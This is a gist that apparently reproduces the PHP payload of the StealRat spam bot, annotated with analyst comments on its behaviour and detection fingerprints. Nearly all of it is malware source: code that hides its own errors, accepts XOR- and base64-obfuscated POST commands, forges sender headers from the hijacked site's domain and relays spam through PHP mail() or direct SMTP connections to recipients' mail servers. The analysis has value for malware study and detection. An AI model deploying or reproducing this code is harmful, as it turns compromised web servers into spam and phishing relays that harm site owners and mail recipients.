
@elektret
Last active December 24, 2015 23:39
<?php
/* STEALRAT SPAM BOT
* PHP PAYLOAD
*
* Not tested, not fully functional.
* Published for educational purposes only.
*/
// Analyst notes (defensive): this is the HTTP-facing entry point of the sample.
// It takes its instructions from POST parameters, tries PHP mail() first and
// then falls back to a hand-rolled SMTP session to the recipient's MX (see
// open_socket()/lookup() below). Every status reply is a short PHP_OS / "OK"
// prefix followed by the md5 of a numeric literal, so the response strings
// themselves are usable as detection indicators for this family.
// Silence all diagnostics so nothing reaches the host's error log.
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
// A GET or a single-field POST is answered with PHP_OS . "10+" . md5(...) and exits.
// NOTE(review): 0987654321 has a leading 0, so PHP parses it as an octal literal;
// 8 and 9 are not octal digits (parse error on PHP 7+, truncated on older versions).
if (count($_POST) < 2)
die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
$is_decoded = false;
// POST field *names* are opaque; only their first character carries meaning:
// 'l' -> field holding the recipient, 'd' -> field holding the message template,
// 'm' -> field holding the SMTP host/address, 'e' -> values are base64+XOR
// encoded (see decode()). The ';' after chr(101) is PHP's alternative case
// terminator, not a typo.
foreach(array_keys($_POST) as $key) {
switch($key[0]) {
case chr(108): $recipient = $key; break;
case chr(100): $payload = $key; break;
case chr(109): $address = $key; break;
case chr(101); $is_decoded = true; break;
}
}
// Status "11+": recipient or template field name is empty. Strict comparison
// against '' — a variable never assigned above (no key with that initial) is
// null and does not take this branch.
if($recipient === '' || $payload === '')
die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
// disable_functions as a list; checked before every call the host may block
// (mail, fsockopen, pfsockopen, stream_socket_client, getmxrr).
$config = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
// Resolve the field names found above to their values.
$recipient = @$_POST[$recipient];
$payload = @$_POST[$payload];
$address = @$_POST[$address];
// Optional transport obfuscation: base64, then XOR 2 on each byte.
if($is_decoded) {
$recipient = decode($recipient);
$payload = decode($payload);
$address = decode($address);
}
$recipient = urldecode(stripslashes($recipient));
$payload = urldecode(stripslashes($payload));
$address = urldecode(stripslashes($address));
// The recipient may arrive as "first;last;address". The two name parts are
// capitalised and feed the %R_NAME%/%R_LNAME% substitutions below; with both
// present the recipient becomes "First Last"<address>, otherwise the bare
// address ($pos3) is kept. Without the ';' form, $recipient is reduced to the
// part after '@' (domain only), which is what RCPT TO and lookup() then see.
// NOTE(review): next(explode(...)) passes a temporary by reference and emits a
// notice on current PHP; error_reporting(0) above hides it.
if(strpos($recipient, ';', 1) != false) {
list($pos1, $pos2, $pos3) = preg_split('/;/', strtolower($recipient));
$pos1 = ucfirst($pos1);
$pos2 = ucfirst($pos2);
$recipient = next(explode('@', $pos3));
if($pos2 == '' || $pos1 == '') {
$pos2 = $pos1 = '';
$recipient = $pos3;
} else $recipient = "\"$pos1 $pos2\"<$pos3>";
} else {
$pos2 = $pos1 = '';
$pos3 = strtolower($recipient);
$recipient = next(explode('@', $recipient));
}
// The template is pseudo-XML; four tags are extracted with case-insensitive,
// dot-matches-newline, ungreedy patterns. A missing tag leaves the variable
// unset (index 1 of an empty match array).
preg_match("|<USER>(.*)</USER>|imsU", $payload, $user);
$user = $user[1];
preg_match("|<NAME>(.*)</NAME>|imsU", $payload, $name);
$name = $name[1];
preg_match("|<SUBJ>(.*)</SUBJ>|imsU", $payload, $subject);
$subject = $subject[1];
preg_match("|<SBODY>(.*)</SBODY>|imsU", $payload, $message);
$message = $message[1];
// Per-recipient personalisation of subject and body.
$subject = str_replace("%R_NAME%", $pos1, $subject);
$subject = str_replace("%R_LNAME%", $pos2, $subject);
$message = str_replace("%R_NAME%", $pos1, $message);
$message = str_replace("%R_LNAME%", $pos2, $message);
// Sender domain is the Host header of this very request minus a www./ftp.
// prefix — i.e. the compromised site's own name.
$domain = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
// $pickup: whether mail() gets an explicit envelope sender via "-f". Disabled
// when the host is addressed as a dotted IPv4 (validate()) or safe_mode is on.
if(validate($domain) || @ini_get('safe_mode')) $pickup = false;
else $pickup = true;
// From/Reply-To: <USER>@<site domain>, with <NAME> as display name if given.
$params = "$user@$domain";
if($name != '') $sender = "$name <$params>";
else $sender = $params;
$reply = "From: $sender\r\n";
$reply .= "Reply-To: $sender\r\n";
// Fixed header set (HTML body, iso-8859-1, 8bit, X-Priority 3) — a constant
// fingerprint on every message this sample produces.
$contenttype = "X-Priority: 3 (Normal)\r\n";
$contenttype .= "MIME-Version:1.0\r\n";
$contenttype .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$contenttype .= "Content-Transfer-Encoding: 8bit\r\n";
// Path 1: PHP mail() when it is not disabled. Success ends the request with
// "OK" . md5(1234567890) . "+0". The `else` below binds to the inner
// `if(@mail(...))`, so the header-only second attempt runs only when $pickup
// is true and the first call failed; with $pickup false neither call is made
// and execution falls through to the raw SMTP path.
if(!in_array('mail', $config))
{
if($pickup)
if(@mail($recipient, $subject, $message, $reply . $contenttype, "-f$sender"))
die(chr(79) . chr(75) . md5(1234567890) . "+0");
else
if(@mail($recipient, $subject, $message, $contenttype))
die(chr(79) . chr(75) . md5(1234567890) . "+0");
}
// Path 2: assemble a complete message for direct SMTP delivery. Message-ID is
// md5(time()) reshaped into 7-5-2 hex groups at the site domain — another
// stable pattern in delivered mail.
$header = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $reply;
$header .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$domain>\r\n";
$header .= "To:$recipient\r\n";
$header .= "Subject: $subject\r\n";
$header .= $contenttype;
$email = $header . "\r\n" . $message;
// No 'm' field: resolve the target's MX (lookup() falls back to 127.0.0.1).
if($address == '') $address = lookup($recipient);
// open_socket() returns 0 for a completed SMTP transaction -> "OK...+1";
// any other return (-1, 1, or an "N+(recipient)+server reply" string) is
// echoed back after PHP_OS . "20+" . md5(...).
if(($fd = open_socket($sender, $recipient, $email, $domain, $address)) == 0)
die(chr(79) . chr(75) . md5(1234567890) . "+1");
else echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$fd";
/* True (1) when $domain is a dotted-quad IPv4 address: first octet 1-255,
 * remaining three 0-255, no leading zeros. The caller uses it to decide
 * whether the request's Host header is a usable sender domain. */
function validate($domain)
{
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $domain);
}
/* UNKNOWN, NOT IN USE
*
* function na73fa8bd($str, $len = 0, $prefix = "=\r\n", $new_len = 0, $toggle = false)
* {
* $size = strlen($str);
* $result = '';
* for($i = 0; $i < $size; $i++) {
* if($len >= 75) {
* $len = $new_len;
* $result .= $prefix;
* }
* $v4a8a08f0 = ord($str[$i]);
* if(($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
* if((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$toggle)) {
* $result .= chr($v4a8a08f0);
* $v11a95b8a = 0;
* continue;
* }
* $result .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
* $v11a95b8a += 3;
* continue;
* }
* $result .= chr($v4a8a08f0); $v11a95b8a++;
* }
* return $result;
* }
*/
/* OPEN TCP SOCKET, PORT 25
 *
 * Direct-to-MX delivery of the prepared $email. Return values:
 *   0   - full SMTP transaction accepted; QUIT sent and socket closed
 *   -1  - fsockopen, pfsockopen and stream_socket_client are all disabled
 *   1   - TCP connect to $address:25 failed
 *   "N+($recipient)+<reply>" - the server answered step N with an unexpected
 *         code (N = 2 EHLO, 3 MAIL FROM, 4 RCPT TO, 5 DATA, 6 end of data);
 *         <reply> is the server text with line breaks folded to '|'.
 * Detection angle: a web-server process opening outbound TCP/25 with a
 * 20-second timeout and sending EHLO with the site's own hostname.
 * Behaviour notes: the greeting banner is read and discarded, no STARTTLS or
 * AUTH is attempted, and on the error returns the socket is never closed.
 */
function open_socket($sender, $recipient, $email, $domain, $address)
{
global $config;
// First connect primitive not listed in disable_functions wins.
if(!in_array('fsockopen', $config))
$socket = @fsockopen($address, 25, $errno, $errstr,20);
elseif(!in_array('pfsockopen', $config))
$socket = @pfsockopen($address, 25, $errno, $errstr, 20);
elseif(!in_array('stream_socket_client', $config) && function_exists("stream_socket_client"))
$socket = @stream_socket_client("tcp://$address:25", $errno, $errstr, 20);
else return -1;
if(!$socket) return 1;
else
{
// Greeting banner; value is never used.
$v8d777f38 = getok($socket);
@fputs($socket, "EHLO $domain\r\n");
$result = getok($socket);
// Reply codes are compared loosely (string "250" against int 250).
if(substr($result, 0, 3) != 250 )
return "2+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);
@fputs($socket, "MAIL FROM:<$sender>\r\n");
$result = getok($socket);
if(substr($result, 0, 3) != 250 )
return "3+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);
@fputs($socket, "RCPT TO:<$recipient>\r\n");
$result = getok($socket);
// 251 ("user not local, will forward") is accepted as well as 250.
if(substr($result, 0, 3) != 250 && substr($result, 0, 3) != 251)
return "4+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);
@fputs($socket, "DATA\r\n");
$result = getok($socket);
if(substr($result, 0, 3) != 354 )
return "5+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);
// Message body sent as-is, terminated by the CRLF.CRLF end-of-data marker.
@fputs($socket, $email . "\r\n.\r\n");
$result = getok($socket);
if(substr($result, 0, 3) != 250 )
return "6+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);
@fputs($socket, "QUIT\r\n");
@fclose($socket); return 0;
}
}
/* Read one SMTP reply from $handle. Lines (max 4096 bytes each) are
 * accumulated until one whose fourth character is a space — the final line
 * of a multi-line reply ("250 OK" as opposed to "250-PIPELINING"). The loop
 * also ends when fgets() returns false or an empty string (EOF, error or
 * timeout), so the caller may receive a truncated reply. */
function getok($handle)
{
$result = '';
while($line = @fgets($handle, 4096)) {
$result .= $line;
if(substr($line, 3, 1) == ' ') break;
}
return $result;
}
/* Resolve the mail exchanger for $hostname: the MX host with the lowest
 * preference value. Returns '127.0.0.1' when getmxrr() is disabled or
 * unavailable, or when no MX records came back.
 * NOTE(review): if getmxrr() fails without populating $mxhosts, count()
 * may receive null — a TypeError on PHP 8 (silenced by error_reporting(0)
 * only as far as warnings go; a TypeError still aborts). */
function lookup($hostname)
{
global $config;
if(!in_array('getmxrr', $config) && function_exists("getmxrr")) {
@getmxrr($hostname, $mxhosts, $precedence);
if(count($mxhosts) === 0) return '127.0.0.1';
// Index of the smallest preference value selects the preferred MX.
$position = array_keys($precedence, min($precedence));
return $mxhosts[$position[0]];
} else return '127.0.0.1';
}
/* Undo the operator's transport obfuscation applied when an 'e' field is
 * present: base64-decode, then XOR every byte with 2. The XOR step is its
 * own inverse; strlen() is evaluated on every iteration. */
function decode($str)
{
$str = base64_decode($str);
$result = '';
for($i = 0; $i < strlen($str); $i++)
$result .= chr(ord($str[$i]) ^ 2);
return $result;
}
?>